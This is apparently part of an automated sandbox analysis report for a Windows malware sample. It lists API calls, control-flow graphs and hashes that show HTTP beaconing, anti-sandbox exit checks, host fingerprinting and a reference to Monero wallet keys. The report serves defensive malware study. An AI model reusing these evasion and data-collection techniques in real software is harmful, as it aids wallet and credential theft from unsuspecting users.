                    • GetProcAddress.KERNEL32(734C0000,01435C30), ref: 0064A1F2
                    • GetProcAddress.KERNEL32(734C0000,0144E3F0), ref: 0064A20B
                    • GetProcAddress.KERNEL32(752C0000,01435C50), ref: 0064A22C
                    • GetProcAddress.KERNEL32(752C0000,01435D90), ref: 0064A244
                    • GetProcAddress.KERNEL32(752C0000,0144E468), ref: 0064A25D
                    • GetProcAddress.KERNEL32(752C0000,0144E510), ref: 0064A275
                    • GetProcAddress.KERNEL32(752C0000,01435D10), ref: 0064A28D
                    • GetProcAddress.KERNEL32(74EC0000,0143C608), ref: 0064A2B3
                    • GetProcAddress.KERNEL32(74EC0000,0143C950), ref: 0064A2CB
                    • GetProcAddress.KERNEL32(74EC0000,0144E438), ref: 0064A2E3
                    • GetProcAddress.KERNEL32(74EC0000,01435D70), ref: 0064A2FC
                    • GetProcAddress.KERNEL32(74EC0000,01435C70), ref: 0064A314
                    • GetProcAddress.KERNEL32(74EC0000,0143CAB8), ref: 0064A32C
                    • GetProcAddress.KERNEL32(75BD0000,0144E408), ref: 0064A352
                    • GetProcAddress.KERNEL32(75BD0000,01435CB0), ref: 0064A36A
                    • GetProcAddress.KERNEL32(75BD0000,0144A048), ref: 0064A382
                    • GetProcAddress.KERNEL32(75BD0000,0144E378), ref: 0064A39B
                    • GetProcAddress.KERNEL32(75BD0000,0144E3A8), ref: 0064A3B3
                    • GetProcAddress.KERNEL32(75BD0000,01435DF0), ref: 0064A3CB
                    • GetProcAddress.KERNEL32(75BD0000,01435BF0), ref: 0064A3E4
                    • GetProcAddress.KERNEL32(75BD0000,0144E4B0), ref: 0064A3FC
                    • GetProcAddress.KERNEL32(75BD0000,0144E480), ref: 0064A414
                    • GetProcAddress.KERNEL32(75A70000,01435CD0), ref: 0064A436
                    • GetProcAddress.KERNEL32(75A70000,0144E4C8), ref: 0064A44E
                    • GetProcAddress.KERNEL32(75A70000,0144E528), ref: 0064A466
                    • GetProcAddress.KERNEL32(75A70000,0144E4E0), ref: 0064A47F
                    • GetProcAddress.KERNEL32(75A70000,0144E420), ref: 0064A497
                    • GetProcAddress.KERNEL32(75450000,01435B50), ref: 0064A4B8
                    • GetProcAddress.KERNEL32(75450000,01435B10), ref: 0064A4D1
                    • GetProcAddress.KERNEL32(75DA0000,01435B90), ref: 0064A4F2
                    • GetProcAddress.KERNEL32(75DA0000,0144E3C0), ref: 0064A50A
                    • GetProcAddress.KERNEL32(6F070000,01435C90), ref: 0064A530
                    • GetProcAddress.KERNEL32(6F070000,01435E10), ref: 0064A548
                    • GetProcAddress.KERNEL32(6F070000,01435BB0), ref: 0064A560
                    • GetProcAddress.KERNEL32(6F070000,0144E3D8), ref: 0064A579
                    • GetProcAddress.KERNEL32(6F070000,01435CF0), ref: 0064A591
                    • GetProcAddress.KERNEL32(6F070000,01435DB0), ref: 0064A5A9
                    • GetProcAddress.KERNEL32(6F070000,01435D30), ref: 0064A5C2
                    • GetProcAddress.KERNEL32(6F070000,01435D50), ref: 0064A5DA
                    • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0064A5F1
                    • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0064A607
                    • GetProcAddress.KERNEL32(75AF0000,0144DDD8), ref: 0064A629
                    • GetProcAddress.KERNEL32(75AF0000,0144A088), ref: 0064A641
                    • GetProcAddress.KERNEL32(75AF0000,0144E000), ref: 0064A659
                    • GetProcAddress.KERNEL32(75AF0000,0144E030), ref: 0064A672
                    • GetProcAddress.KERNEL32(75D90000,01435DD0), ref: 0064A693
                    • GetProcAddress.KERNEL32(6F9D0000,0144DE80), ref: 0064A6B4
                    • GetProcAddress.KERNEL32(6F9D0000,01435E30), ref: 0064A6CD
                    • GetProcAddress.KERNEL32(6F9D0000,0144E060), ref: 0064A6E5
                    • GetProcAddress.KERNEL32(6F9D0000,0144DD90), ref: 0064A6FD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$LibraryLoad
                    • String ID: HttpQueryInfoA$InternetSetOptionA
                    • API String ID: 2238633743-1775429166
                    • Opcode ID: a78891b89af925621977f9d8b2c64f23764dba4c888e7f038d2c6f9df3b3fdba
                    • Instruction ID: e59b461554ecd30f97e51b8b3e09ec6393ed09eac91b197392a2ba03ca37d531
                    • Opcode Fuzzy Hash: a78891b89af925621977f9d8b2c64f23764dba4c888e7f038d2c6f9df3b3fdba
                    • Instruction Fuzzy Hash: 666228B5514200AFC34CDFA8ED8D96A3BF9F7C8641714852AA65D8327CD63AD8C1DB23
                    Function 00636280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1033 636280-63630b call 64a7a0 call 6347b0 call 64a740 InternetOpenA StrCmpCA 1040 636314-636318 1033->1040 1041 63630d 1033->1041 1042 636509-636525 call 64a7a0 call 64a800 * 2 1040->1042 1043 63631e-636342 InternetConnectA 1040->1043 1041->1040 1061 636528-63652d 1042->1061 1044 636348-63634c 1043->1044 1045 6364ff-636503 InternetCloseHandle 1043->1045 1047 63635a 1044->1047 1048 63634e-636358 1044->1048 1045->1042 1050 636364-636392 HttpOpenRequestA 1047->1050 1048->1050 1052 6364f5-6364f9 InternetCloseHandle 1050->1052 1053 636398-63639c 1050->1053 1052->1045 1055 6363c5-636405 HttpSendRequestA HttpQueryInfoA 1053->1055 1056 63639e-6363bf InternetSetOptionA 1053->1056 1059 636407-636427 call 64a740 call 64a800 * 2 1055->1059 1060 63642c-63644b call 648940 1055->1060 1056->1055 1059->1061 1066 6364c9-6364e9 call 64a740 call 64a800 * 2 1060->1066 1067 63644d-636454 1060->1067 1066->1061 1070 6364c7-6364ef InternetCloseHandle 1067->1070 1071 636456-636480 InternetReadFile 1067->1071 1070->1052 1075 636482-636489 1071->1075 1076 63648b 1071->1076 1075->1076 1080 63648d-6364c5 call 64a9b0 call 64a8a0 call 64a800 1075->1080 1076->1070 1080->1071
                    APIs
                      • Part of subcall function 0064A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0064A7E6
                      • Part of subcall function 006347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00634839
                      • Part of subcall function 006347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00634849
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                    • InternetOpenA.WININET(00650DFE,00000001,00000000,00000000,00000000), ref: 006362E1
                    • StrCmpCA.SHLWAPI(?,014507B0), ref: 00636303
                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00636335
                    • HttpOpenRequestA.WININET(00000000,GET,?,0144FDD8,00000000,00000000,00400100,00000000), ref: 00636385
                    • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006363BF
                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006363D1
                    • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 006363FD
                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0063646D
                    • InternetCloseHandle.WININET(00000000), ref: 006364EF
                    • InternetCloseHandle.WININET(00000000), ref: 006364F9
                    • InternetCloseHandle.WININET(00000000), ref: 00636503
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                    • String ID: ERROR$ERROR$GET
                    • API String ID: 3749127164-2509457195
                    • Opcode ID: 8f0dfe6e6b7ecb01a50cdfe7ce6d92031c34d4c639524961f70541ad95e56e3d
                    • Instruction ID: a6bad5663ef487828e490befeeee449513f597f867fd296b2eda8e1a99b5af02
                    • Opcode Fuzzy Hash: 8f0dfe6e6b7ecb01a50cdfe7ce6d92031c34d4c639524961f70541ad95e56e3d
                    • Instruction Fuzzy Hash: 4B714171A40218BBEB24DFD0CC49BEE77B9FB44700F108158F50A6B195DBB4AA85CF91
                    Function 00645510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1090 645510-645577 call 645ad0 call 64a820 * 3 call 64a740 * 4 1106 64557c-645583 1090->1106 1107 645585-6455b6 call 64a820 call 64a7a0 call 631590 call 6451f0 1106->1107 1108 6455d7-64564c call 64a740 * 2 call 631590 call 6452c0 call 64a8a0 call 64a800 call 64aad0 StrCmpCA 1106->1108 1124 6455bb-6455d2 call 64a8a0 call 64a800 1107->1124 1134 645693-6456a9 call 64aad0 StrCmpCA 1108->1134 1137 64564e-64568e call 64a7a0 call 631590 call 6451f0 call 64a8a0 call 64a800 1108->1137 1124->1134 1139 6457dc-645844 call 64a8a0 call 64a820 * 2 call 631670 call 64a800 * 4 call 646560 call 631550 1134->1139 1140 6456af-6456b6 1134->1140 1137->1134 1271 645ac3-645ac6 1139->1271 1142 6456bc-6456c3 1140->1142 1143 6457da-64585f call 64aad0 StrCmpCA 1140->1143 1146 6456c5-645719 call 64a820 call 64a7a0 call 631590 call 6451f0 call 64a8a0 call 64a800 1142->1146 1147 64571e-645793 call 64a740 * 2 call 631590 call 6452c0 call 64a8a0 call 64a800 call 64aad0 StrCmpCA 1142->1147 1161 645865-64586c 1143->1161 1162 645991-6459f9 call 64a8a0 call 64a820 * 2 call 631670 call 64a800 * 4 call 646560 call 631550 1143->1162 1146->1143 1147->1143 1250 645795-6457d5 call 64a7a0 call 631590 call 6451f0 call 64a8a0 call 64a800 1147->1250 1167 645872-645879 1161->1167 1168 64598f-645a14 call 64aad0 StrCmpCA 1161->1168 1162->1271 1175 6458d3-645948 call 64a740 * 2 call 631590 call 6452c0 call 64a8a0 call 64a800 call 64aad0 StrCmpCA 1167->1175 1176 64587b-6458ce call 64a820 call 64a7a0 call 631590 call 6451f0 call 64a8a0 call 64a800 1167->1176 1197 645a16-645a21 Sleep 1168->1197 1198 645a28-645a91 call 64a8a0 call 64a820 * 2 call 631670 call 64a800 * 4 call 646560 call 631550 1168->1198 1175->1168 1276 64594a-64598a call 64a7a0 call 631590 call 6451f0 call 64a8a0 call 64a800 1175->1276 1176->1168 1197->1106 1198->1271 1250->1143 1276->1168
                    APIs
                      • Part of subcall function 0064A820: lstrlen.KERNEL32(00634F05,?,?,00634F05,00650DDE), ref: 0064A82B
                      • Part of subcall function 0064A820: lstrcpy.KERNEL32(00650DDE,00000000), ref: 0064A885
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00645644
                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006456A1
                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00645857
                      • Part of subcall function 0064A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0064A7E6
                      • Part of subcall function 006451F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00645228
                      • Part of subcall function 0064A8A0: lstrcpy.KERNEL32(?,00650E17), ref: 0064A905
                      • Part of subcall function 006452C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00645318
                      • Part of subcall function 006452C0: lstrlen.KERNEL32(00000000), ref: 0064532F
                      • Part of subcall function 006452C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00645364
                      • Part of subcall function 006452C0: lstrlen.KERNEL32(00000000), ref: 00645383
                      • Part of subcall function 006452C0: lstrlen.KERNEL32(00000000), ref: 006453AE
                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0064578B
                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00645940
                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00645A0C
                    • Sleep.KERNEL32(0000EA60), ref: 00645A1B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpylstrlen$Sleep
                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                    • API String ID: 507064821-2791005934
                    • Opcode ID: aa565ad9f4f52b18082d0d5b7e3309b85da843fb632ea07153fed06c443a4f24
                    • Instruction ID: 7ec515429a8bbffb99872769a0329a2820def20e79008669ffcc16127b3c579f
                    • Opcode Fuzzy Hash: aa565ad9f4f52b18082d0d5b7e3309b85da843fb632ea07153fed06c443a4f24
                    • Instruction Fuzzy Hash: DBE14072950104ABDB58FBE0DC96AED733BBF95300F40812CB50766196EF34AB49CB96
                    Function 006417A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1301 6417a0-6417cd call 64aad0 StrCmpCA 1304 6417d7-6417f1 call 64aad0 1301->1304 1305 6417cf-6417d1 ExitProcess 1301->1305 1309 6417f4-6417f8 1304->1309 1310 6419c2-6419cd call 64a800 1309->1310 1311 6417fe-641811 1309->1311 1313 641817-64181a 1311->1313 1314 64199e-6419bd 1311->1314 1316 641821-641830 call 64a820 1313->1316 1317 6418ad-6418be StrCmpCA 1313->1317 1318 6418cf-6418e0 StrCmpCA 1313->1318 1319 64198f-641999 call 64a820 1313->1319 1320 641849-641858 call 64a820 1313->1320 1321 641835-641844 call 64a820 1313->1321 1322 641970-641981 StrCmpCA 1313->1322 1323 6418f1-641902 StrCmpCA 1313->1323 1324 641951-641962 StrCmpCA 1313->1324 1325 641932-641943 StrCmpCA 1313->1325 1326 641913-641924 StrCmpCA 1313->1326 1327 64185d-64186e StrCmpCA 1313->1327 1328 64187f-641890 StrCmpCA 1313->1328 1314->1309 1316->1314 1348 6418c0-6418c3 1317->1348 1349 6418ca 1317->1349 1350 6418e2-6418e5 1318->1350 1351 6418ec 1318->1351 1319->1314 1320->1314 1321->1314 1338 641983-641986 1322->1338 1339 64198d 1322->1339 1329 641904-641907 1323->1329 1330 64190e 1323->1330 1335 641964-641967 1324->1335 1336 64196e 1324->1336 1333 641945-641948 1325->1333 1334 64194f 1325->1334 1331 641926-641929 1326->1331 1332 641930 1326->1332 1344 641870-641873 1327->1344 1345 64187a 1327->1345 1346 641892-64189c 1328->1346 1347 64189e-6418a1 1328->1347 1329->1330 1330->1314 1331->1332 1332->1314 1333->1334 1334->1314 1335->1336 1336->1314 1338->1339 1339->1314 1344->1345 1345->1314 1355 6418a8 1346->1355 1347->1355 1348->1349 1349->1314 1350->1351 1351->1314 1355->1314
                    APIs
                    • StrCmpCA.SHLWAPI(00000000,block), ref: 006417C5
                    • ExitProcess.KERNEL32 ref: 006417D1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExitProcess
                    • String ID: block
                    • API String ID: 621844428-2199623458
                    • Opcode ID: d1b3c7de53648eb632caf47f2618c984d3fe8d27f524b9fdf56749f9f9363322
                    • Instruction ID: a1a1065e8b8ded0b52009e97946ab0977c24a0ed6cde0d87e888c84d9321f54e
                    • Opcode Fuzzy Hash: d1b3c7de53648eb632caf47f2618c984d3fe8d27f524b9fdf56749f9f9363322
                    • Instruction Fuzzy Hash: DC515EB5B1420AEFDB04DFA0D964ABE77B6BF45704F108058E806AB340D770E996CF62
                    Function 00647500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1356 647500-64754a GetWindowsDirectoryA 1357 647553-6475c7 GetVolumeInformationA call 648d00 * 3 1356->1357 1358 64754c 1356->1358 1365 6475d8-6475df 1357->1365 1358->1357 1366 6475e1-6475fa call 648d00 1365->1366 1367 6475fc-647617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 647628-647658 wsprintfA call 64a740 1367->1369 1370 647619-647626 call 64a740 1367->1370 1377 64767e-64768e 1369->1377 1370->1377
                    APIs
                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00647542
                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0064757F
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00647603
                    • RtlAllocateHeap.NTDLL(00000000), ref: 0064760A
                    • wsprintfA.USER32 ref: 00647640
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                    • String ID: :$C$\$e
                    • API String ID: 1544550907-2952404552
                    • Opcode ID: 032051f235db6f256f823d9b58d1d31bd27afd526100487f3115580b01e81505
                    • Instruction ID: bd2e4027d3fdf14889e7df7ee459a239612782af301032089ee2fdcd09042968
                    • Opcode Fuzzy Hash: 032051f235db6f256f823d9b58d1d31bd27afd526100487f3115580b01e81505
                    • Instruction Fuzzy Hash: 4141B3B1D04248ABDF14DF94DC45BEEBBB9FF48704F100098F50967280DB74AA84CBA5
                    Function 006469F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 00649860: GetProcAddress.KERNEL32(74DD0000,01443018), ref: 006498A1
                      • Part of subcall function 00649860: GetProcAddress.KERNEL32(74DD0000,01443210), ref: 006498BA
                      • Part of subcall function 00649860: GetProcAddress.KERNEL32(74DD0000,01443138), ref: 006498D2
                      • Part of subcall function 00649860: GetProcAddress.KERNEL32(74DD0000,01443180), ref: 006498EA
                      • Part of subcall function 00649860: GetProcAddress.KERNEL32(74DD0000,01443270), ref: 00649903
                      • Part of subcall function 00649860: GetProcAddress.KERNEL32(74DD0000,01449F18), ref: 0064991B
                      • Part of subcall function 00649860: GetProcAddress.KERNEL32(74DD0000,01435870), ref: 00649933
                      • Part of subcall function 00649860: GetProcAddress.KERNEL32(74DD0000,01435810), ref: 0064994C
                      • Part of subcall function 00649860: GetProcAddress.KERNEL32(74DD0000,01443240), ref: 00649964
                      • Part of subcall function 00649860: GetProcAddress.KERNEL32(74DD0000,01443078), ref: 0064997C
                      • Part of subcall function 00649860: GetProcAddress.KERNEL32(74DD0000,014431F8), ref: 00649995
                      • Part of subcall function 00649860: GetProcAddress.KERNEL32(74DD0000,01443288), ref: 006499AD
                      • Part of subcall function 00649860: GetProcAddress.KERNEL32(74DD0000,014358F0), ref: 006499C5
                      • Part of subcall function 00649860: GetProcAddress.KERNEL32(74DD0000,01443258), ref: 006499DE
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                      • Part of subcall function 006311D0: ExitProcess.KERNEL32 ref: 00631211
                      • Part of subcall function 00631160: GetSystemInfo.KERNEL32(?), ref: 0063116A
                      • Part of subcall function 00631160: ExitProcess.KERNEL32 ref: 0063117E
                      • Part of subcall function 00631110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0063112B
                      • Part of subcall function 00631110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00631132
                      • Part of subcall function 00631110: ExitProcess.KERNEL32 ref: 00631143
                      • Part of subcall function 00631220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0063123E
                      • Part of subcall function 00631220: ExitProcess.KERNEL32 ref: 00631294
                      • Part of subcall function 00646770: GetUserDefaultLangID.KERNEL32 ref: 00646774
                      • Part of subcall function 00631190: ExitProcess.KERNEL32 ref: 006311C6
                      • Part of subcall function 00647850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006311B7), ref: 00647880
                      • Part of subcall function 00647850: RtlAllocateHeap.NTDLL(00000000), ref: 00647887
                      • Part of subcall function 00647850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0064789F
                      • Part of subcall function 006478E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00647910
                      • Part of subcall function 006478E0: RtlAllocateHeap.NTDLL(00000000), ref: 00647917
                      • Part of subcall function 006478E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0064792F
                      • Part of subcall function 0064A9B0: lstrlen.KERNEL32(?,01449E88,?,\Monero\wallet.keys,00650E17), ref: 0064A9C5
                      • Part of subcall function 0064A9B0: lstrcpy.KERNEL32(00000000), ref: 0064AA04
                      • Part of subcall function 0064A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0064AA12
                      • Part of subcall function 0064A8A0: lstrcpy.KERNEL32(?,00650E17), ref: 0064A905
                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01449FF8,?,0065110C,?,00000000,?,00651110,?,00000000,00650AEF), ref: 00646ACA
                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00646AE8
                    • CloseHandle.KERNEL32(00000000), ref: 00646AF9
                    • Sleep.KERNEL32(00001770), ref: 00646B04
                    • CloseHandle.KERNEL32(?,00000000,?,01449FF8,?,0065110C,?,00000000,?,00651110,?,00000000,00650AEF), ref: 00646B1A
                    • ExitProcess.KERNEL32 ref: 00646B22
                    Memory Dump Source
